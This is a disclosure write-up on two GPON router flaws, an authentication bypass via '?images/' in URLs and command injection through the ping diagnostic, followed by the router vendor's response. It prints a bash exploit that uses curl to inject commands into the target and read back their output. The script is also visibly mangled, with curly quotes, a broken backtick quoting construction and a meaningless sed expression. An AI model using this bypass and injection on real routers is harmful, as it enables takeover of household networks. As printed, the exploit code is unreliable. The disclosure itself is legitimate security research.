Exploitation:
During our analysis of GPON firmwares, we found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could, when combined allow complete control on the device and therefore the network. The first vulnerability exploits the authentication mechanism of the device that has a flaw. This flaw allows any attacker to bypass all authentication.
The flaw can be found with the HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.
By appending ?images/ to the URL, the attacker can bypass the endpoint.
This works on both HTML pages and GponForm/
For instance, by inserting
/menu.html?images/ or /GponForm/diag_FORM?images/
we can manage the device.
While looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected by the host parameter.
Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.
We include the following bash version of the exploit code: #!/bin/bash
echo “[+] Sending the Command… " # We send the commands with two modes backtick () and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\
$2`;$2&ipv=0” $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo “[+] Waiting….” sleep 3 echo “[+] Retrieving the ouput….” curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ’ | sed -e ’s/\n/\n/g’
Impact:
GPON is a type of passive optical network that uses fiber-optics and is particularly popular. When people use GPON, the routers are provided by ISPs. Over one million people use this type of network system router. We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.
Recommendations:
Update: Statement from DZS regarding authentication bypass exploit
DASAN Zhone Solutions, Inc. has investigated recent media reports that certain DZS GPON Network Interface Devices (NIDs), more commonly known as routers, could be vulnerable to an authentication bypass exploit. DZS has determined that the ZNID-GPON-25xx series and certain H640series GPON ONTs, when operating on specific software releases, are affected by this vulnerability. No service impacts from this vulnerability have been reported to DZS to date. After an internal investigation, we have determined the potential impact is much more limited in scope than reported by vpnMentor. According to DZS sales records, combined with field data gathered to date, we have estimated that the number of GPON ONT units that may be potentially impacted to be less than 240,000. In addition, given the relative maturity of the products in their lifecycle, we think the impact is limited to even fewer devices. Product History The DZS ZNID-GPON-25xx and certain H640-series ONTs, including the software that introduced this vulnerability, were developed by an OEM supplier and resold by DZS. Designed and released more than 9 years ago, most of these products are now well past their sustainable service life. Because software support contracts are no longer offered for most of these products, we do not have direct insight to the total number of units that are still actively used in the field. Resolution DZS has informed all the customers who purchased these models of the vulnerability. We are working with each customer to help them assess methods to address the issue for units that may still be installed in the field. It will be up to the discretion of each customer to decide how to address the condition for their deployed equipment. DZS’s mission is to ensure that all its solutions meet the highest security standards in the industry. We embrace this, and every opportunity, to review and continuously improve our security design and testing methodologies.